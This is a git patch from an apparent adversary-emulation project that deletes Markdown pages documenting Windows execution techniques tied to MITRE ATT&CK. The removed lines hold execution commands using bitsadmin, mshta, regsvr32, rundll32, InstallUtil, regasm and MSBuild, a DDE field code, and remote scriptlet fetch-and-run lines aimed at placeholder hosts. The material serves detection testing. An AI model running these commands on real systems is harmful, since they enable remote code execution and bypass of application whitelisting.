From 9985eef47788bcf0ac1b36e7c6b9c87ff7fdec6f Mon Sep 17 00:00:00 2001 From: caseysmithrc <30840394+caseysmithrc@users.noreply.github.com> Date: Wed, 23 May 2018 20:02:58 -0600 Subject: [PATCH] delete yamlized things --- Windows/Execution/Bitsadmin.md | 11 ---------- Windows/Execution/CMSTP.md | 15 ------------- Windows/Execution/Dynamic_Data_Exchange.md | 19 ---------------- Windows/Execution/InstallUtil.md | 15 ------------- Windows/Execution/Mshta.md | 12 ---------- Windows/Execution/RegsvcsRegasm.md | 22 ------------------- Windows/Execution/Regsvr32.md | 16 -------------- Windows/Execution/Rundll32.md | 13 ----------- .../Execution/Trusted_Developer_Utilities.md | 12 ---------- 9 files changed, 135 deletions(-) delete mode 100644 Windows/Execution/Bitsadmin.md delete mode 100644 Windows/Execution/CMSTP.md delete mode 100644 Windows/Execution/Dynamic_Data_Exchange.md delete mode 100644 Windows/Execution/InstallUtil.md delete mode 100644 Windows/Execution/Mshta.md delete mode 100644 Windows/Execution/RegsvcsRegasm.md delete mode 100644 Windows/Execution/Regsvr32.md delete mode 100644 Windows/Execution/Rundll32.md delete mode 100644 Windows/Execution/Trusted_Developer_Utilities.md diff --git a/Windows/Execution/Bitsadmin.md b/Windows/Execution/Bitsadmin.md deleted file mode 100644 index 2452527b..00000000 --- a/Windows/Execution/Bitsadmin.md +++ /dev/null @@ -1,11 +0,0 @@ -## BITS Jobs - -MITRE ATT&CK Technique: [T1197](https://attack.mitre.org/wiki/Technique/T1197) - -### bitsadmin.exe - - bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Execution/Bitsadmin.md $env:TEMP\AtomicRedTeam\bitsadmin_flag.ps1 - -### PowerShell - - Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Execution/Bitsadmin.md -Destination $env:TEMP\AtomicRedTeam\bitsadmin_flag.ps1 diff --git a/Windows/Execution/CMSTP.md b/Windows/Execution/CMSTP.md deleted file mode 100644 index 1ab9f1a0..00000000 --- a/Windows/Execution/CMSTP.md +++ /dev/null @@ -1,15 +0,0 @@ -## CMSTP - -MITRE ATT&CK Technique: [T1191](https://attack.mitre.org/wiki/Technique/T1191) - -### Scriptlet execution - -Local: - - cmstp.exe /s CMSTP.inf - -## Test Script - -[CMSTP.INF](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/CMSTP.inf) - -[CMSTP.SCT](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/CMSTP.sct) diff --git a/Windows/Execution/Dynamic_Data_Exchange.md b/Windows/Execution/Dynamic_Data_Exchange.md deleted file mode 100644 index 0e7e4c8c..00000000 --- a/Windows/Execution/Dynamic_Data_Exchange.md +++ /dev/null @@ -1,19 +0,0 @@ -# Dynamic Data Exchange - -MITRE ATT&CK Technique: [T1173](https://attack.mitre.org/wiki/Technique/T1173) - - -### Microsoft Word - -Open, - -Insert tab -> Quick Parts -> Field - -Choose = (Formula) and click ok. - -After that, you should see a Field inserted in the document with an error “!Unexpected End of Formula”, right-click the Field, and choose Toggle Field Codes. - -The Field Code should now be displayed, change it to Contain the following: - - - {DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe" } diff --git a/Windows/Execution/InstallUtil.md b/Windows/Execution/InstallUtil.md deleted file mode 100644 index 5534fc11..00000000 --- a/Windows/Execution/InstallUtil.md +++ /dev/null @@ -1,15 +0,0 @@ -## InstallUtil - -MITRE ATT&CK Technique: [T1118](https://attack.mitre.org/wiki/Technique/T1118) - -### Execution Examples: - -Input: - - x86 - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U InstallUtilBypass.dll - - x64 - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U InstallUtilBypass.dll - -## Test Script - -[InstallUtilBypass.cs](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/InstallUtilBypass.cs) diff --git a/Windows/Execution/Mshta.md b/Windows/Execution/Mshta.md deleted file mode 100644 index 4a06deb5..00000000 --- a/Windows/Execution/Mshta.md +++ /dev/null @@ -1,12 +0,0 @@ -## Mshta - -MITRE ATT&CK Technique: [T1170](https://attack.mitre.org/wiki/Technique/T1170) - -### Example Execution: - - mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")")) - -## Test Script - mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/mshta.sct").Exec();close(); - -[mshta.sct](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct) diff --git a/Windows/Execution/RegsvcsRegasm.md b/Windows/Execution/RegsvcsRegasm.md deleted file mode 100644 index a65c88c5..00000000 --- a/Windows/Execution/RegsvcsRegasm.md +++ /dev/null @@ -1,22 +0,0 @@ -## Regsvcs/Regasm - -MITRE ATT&CK Technique: [T1121](https://attack.mitre.org/wiki/Technique/T1121) - -### Execution Examples: - -[DLL](https://github.com/redcanaryco/atomic-red-team/tree/master/Windows/Payloads/AllTheThings) - -Input: - - x86 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll - - x64 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThings.dll - - - x86 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll - - x64 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThings.dll - - -## Test Script -[RegSvcsRegAsmBypass.cs](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/RegSvcsRegAsmBypass.cs) diff --git a/Windows/Execution/Regsvr32.md b/Windows/Execution/Regsvr32.md deleted file mode 100644 index 1f790250..00000000 --- a/Windows/Execution/Regsvr32.md +++ /dev/null @@ -1,16 +0,0 @@ -## Regsvr32 - -MITRE ATT&CK Technique: [T1117](https://attack.mitre.org/wiki/Technique/T1117) - -### Local Scriptlet Execution: - - regsvr32.exe /s /u /i:file.sct scrobj.dll - -### Remote Scriptlet Exection: - - regsvr32.exe /s /u /i:http://example.com/file.sct scrobj.dll - -## Test Script - -[regsvr32.sct](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/RegSvr32.sct) - diff --git a/Windows/Execution/Rundll32.md b/Windows/Execution/Rundll32.md deleted file mode 100644 index 0d8164bd..00000000 --- a/Windows/Execution/Rundll32.md +++ /dev/null @@ -1,13 +0,0 @@ -## Rundll32 - -MITRE ATT&CK Technique: [T1085](https://attack.mitre.org/wiki/Technique/T1085) - -### Executes an export inside of a dll. - - rundll32 AllTheThings.dll,EntryPoint - -## Test Script - -[AlltheThings.dll](https://github.com/redcanaryco/atomic-red-team/tree/master/Windows/Payloads/AllTheThings) - - diff --git a/Windows/Execution/Trusted_Developer_Utilities.md b/Windows/Execution/Trusted_Developer_Utilities.md deleted file mode 100644 index 47992d0d..00000000 --- a/Windows/Execution/Trusted_Developer_Utilities.md +++ /dev/null @@ -1,12 +0,0 @@ -## Trusted Developer Utilities - -MITRE ATT&CK Technique: [T1127](https://attack.mitre.org/wiki/Technique/T1127) - -### MSBuild.exe - [Inline Tasks](https://msdn.microsoft.com/en-us/library/dd722601.aspx) - - C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe File.csproj - -## Test Script - -[MSBuildBypass.csproj](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/MSBuildBypass.csproj) -